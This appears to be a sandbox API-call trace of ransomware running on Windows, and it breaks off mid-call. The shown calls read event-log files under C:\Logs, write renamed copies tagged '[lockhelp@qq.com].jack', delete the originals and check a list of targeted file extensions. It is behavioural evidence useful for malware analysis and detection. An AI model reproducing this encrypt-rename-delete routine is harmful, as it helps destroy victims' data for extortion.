GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.885] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.885] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.885] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.885] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0210.886] GetLastError () returned 0x0 [0210.886] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.888] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.889] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0210.889] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x128, lpOverlapped=0x0) returned 1 [0210.889] SetEndOfFile (hFile=0x454) returned 1 [0210.889] CloseHandle (hObject=0x454) returned 1 [0210.891] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.891] SetEndOfFile (hFile=0x420) returned 1 [0210.892] CloseHandle (hObject=0x420) returned 1 [0210.893] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.893] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx")) returned 1 [0210.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.893] lstrlenW (lpString=".doc") returned 4 [0210.893] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.893] lstrlenW (lpString=".docx") returned 5 [0210.893] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.893] lstrlenW (lpString=".pdf") returned 4 [0210.893] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.893] lstrlenW (lpString=".xls") returned 4 [0210.893] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.893] lstrlenW (lpString=".xlsx") returned 5 [0210.893] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.893] lstrlenW (lpString=".ppt") returned 4 [0210.893] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.893] lstrlenW (lpString=".zip") returned 4 [0210.893] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".rar") returned 4 [0210.894] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".bz2") returned 4 [0210.894] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".7z") returned 3 [0210.894] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString=".dbf") returned 4 [0210.894] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString=".1cd") returned 4 [0210.894] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString=".jpg") returned 4 [0210.894] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString=".doc") returned 4 [0210.894] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".docx") returned 5 [0210.894] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.894] lstrlenW (lpString=".pdf") returned 4 [0210.894] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".xls") returned 4 [0210.894] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".xlsx") returned 5 [0210.894] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.894] lstrlenW (lpString=".ppt") returned 4 [0210.894] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.894] lstrlenW (lpString=".zip") returned 4 [0210.894] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".rar") returned 4 [0210.894] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".bz2") returned 4 [0210.894] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.894] lstrlenW (lpString=".7z") returned 3 [0210.895] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.895] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.895] lstrlenW (lpString=".dbf") returned 4 [0210.895] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.895] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.895] lstrlenW (lpString=".1cd") returned 4 [0210.895] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.895] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 50 [0210.895] lstrlenW (lpString=".jpg") returned 4 [0210.895] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.895] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.895] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Audit.evtx") returned 39 [0210.895] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.895] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0210.895] CloseHandle (hObject=0x420) returned 1 [0210.895] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 0x20 [0210.895] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.895] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0210.896] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.896] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.896] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0210.896] GetLastError () returned 0x0 [0210.896] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.919] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.963] ReadFile (in: hFile=0x420, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0210.963] WriteFile (in: hFile=0x454, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x122, lpOverlapped=0x0) returned 1 [0210.963] SetEndOfFile (hFile=0x454) returned 1 [0210.963] CloseHandle (hObject=0x454) returned 1 [0210.965] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0210.965] SetEndOfFile (hFile=0x420) returned 1 [0214.530] CloseHandle (hObject=0x420) returned 1 [0214.530] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0214.530] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx")) returned 1 [0214.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.600] lstrlenW (lpString=".doc") returned 4 [0214.600] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.600] lstrlenW (lpString=".docx") returned 5 [0214.600] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.600] lstrlenW (lpString=".pdf") returned 4 [0214.600] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.600] lstrlenW (lpString=".xls") returned 4 [0214.600] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.600] lstrlenW (lpString=".xlsx") returned 5 [0214.600] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.600] lstrlenW (lpString=".ppt") returned 4 [0214.600] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.600] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.600] lstrlenW (lpString=".zip") returned 4 [0214.600] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.600] lstrlenW (lpString=".rar") returned 4 [0214.601] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".bz2") returned 4 [0214.601] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".7z") returned 3 [0214.601] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString=".dbf") returned 4 [0214.601] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString=".1cd") returned 4 [0214.601] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString=".jpg") returned 4 [0214.601] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString=".doc") returned 4 [0214.601] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".docx") returned 5 [0214.601] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0214.601] lstrlenW (lpString=".pdf") returned 4 [0214.601] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".xls") returned 4 [0214.601] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".xlsx") returned 5 [0214.601] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0214.601] lstrlenW (lpString=".ppt") returned 4 [0214.601] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.601] lstrlenW (lpString=".zip") returned 4 [0214.601] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".rar") returned 4 [0214.601] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".bz2") returned 4 [0214.601] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0214.601] lstrlenW (lpString=".7z") returned 3 [0214.602] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0214.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.602] lstrlenW (lpString=".dbf") returned 4 [0214.602] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0214.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.602] lstrlenW (lpString=".1cd") returned 4 [0214.602] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0214.602] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 47 [0214.602] lstrlenW (lpString=".jpg") returned 4 [0214.602] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0214.602] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0214.602] lstrlenW (lpString="Microsoft-Windows-SMBServer%4Operational.evtx") returned 45 [0214.602] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0214.602] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0214.602] CloseHandle (hObject=0x3ac) returned 1 [0214.602] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 0x20 [0214.602] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0214.603] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0214.603] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0214.603] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0214.603] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0214.603] GetLastError () returned 0x0 [0214.603] ReadFile (in: hFile=0x3ac, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0214.848] WriteFile (in: hFile=0x3d8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0214.849] ReadFile (in: hFile=0x3ac, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0214.849] WriteFile (in: hFile=0x3d8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x12e, lpOverlapped=0x0) returned 1 [0214.849] SetEndOfFile (hFile=0x3d8) returned 1 [0215.096] CloseHandle (hObject=0x3d8) returned 1 [0215.098] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.099] SetEndOfFile (hFile=0x3ac) returned 1 [0215.100] CloseHandle (hObject=0x3ac) returned 1 [0215.100] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0215.100] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 1 [0215.100] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.100] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.100] lstrlenW (lpString=".doc") returned 4 [0215.100] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.100] lstrlenW (lpString=".docx") returned 5 [0215.100] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.101] lstrlenW (lpString=".pdf") returned 4 [0215.101] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".xls") returned 4 [0215.101] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".xlsx") returned 5 [0215.101] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.101] lstrlenW (lpString=".ppt") returned 4 [0215.101] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString=".zip") returned 4 [0215.101] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".rar") returned 4 [0215.101] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".bz2") returned 4 [0215.101] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".7z") returned 3 [0215.101] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString=".dbf") returned 4 [0215.101] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString=".1cd") returned 4 [0215.101] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString=".jpg") returned 4 [0215.101] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.101] lstrlenW (lpString=".doc") returned 4 [0215.101] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0215.101] lstrlenW (lpString=".docx") returned 5 [0215.101] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0215.102] lstrlenW (lpString=".pdf") returned 4 [0215.102] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString=".xls") returned 4 [0215.102] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString=".xlsx") returned 5 [0215.102] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0215.102] lstrlenW (lpString=".ppt") returned 4 [0215.102] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.102] lstrlenW (lpString=".zip") returned 4 [0215.102] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString=".rar") returned 4 [0215.102] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString=".bz2") returned 4 [0215.102] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString=".7z") returned 3 [0215.102] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0215.102] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.102] lstrlenW (lpString=".dbf") returned 4 [0215.102] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.102] lstrlenW (lpString=".1cd") returned 4 [0215.102] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0215.102] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0215.102] lstrlenW (lpString=".jpg") returned 4 [0215.102] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0215.102] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0215.102] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 72 [0215.103] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.103] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0215.103] CloseHandle (hObject=0x3ac) returned 1 [0215.103] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 0x20 [0215.103] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.103] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0215.103] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.104] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0215.104] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0215.104] GetLastError () returned 0x0 [0215.104] ReadFile (in: hFile=0x3ac, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0215.118] WriteFile (in: hFile=0x3d8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0215.120] ReadFile (in: hFile=0x3ac, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, 